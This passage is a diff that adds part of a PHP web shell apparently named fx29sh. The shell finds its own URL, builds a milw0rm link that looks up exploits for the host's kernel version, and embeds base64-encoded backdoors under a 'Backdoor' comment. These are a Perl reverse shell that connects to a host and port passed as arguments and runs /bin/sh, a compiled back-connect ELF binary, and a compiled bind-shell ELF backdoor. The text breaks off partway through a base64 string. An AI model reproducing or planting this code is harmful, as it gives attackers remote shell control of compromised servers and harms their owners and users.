+  $itshome = str_replace("/public_html","/fx29sh.php",$itshome);
+}
+else { $itshome = ""; }
+$enumerate = "http://".$hostname_x."/".$itshome."";
+//End Enumerate function
+
+//milw0rm search
+$Lversion = php_uname(r);
+$OSV = php_uname(s);
+if(eregi("Linux",$OSV)) {
+  $Lversion=substr($Lversion,0,6);
+  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+} else {
+  $Lversion=substr($Lversion,0,3);
+  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+}
+//End of milw0rm search
+
+//Backdoor
+$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+$backdoor = "f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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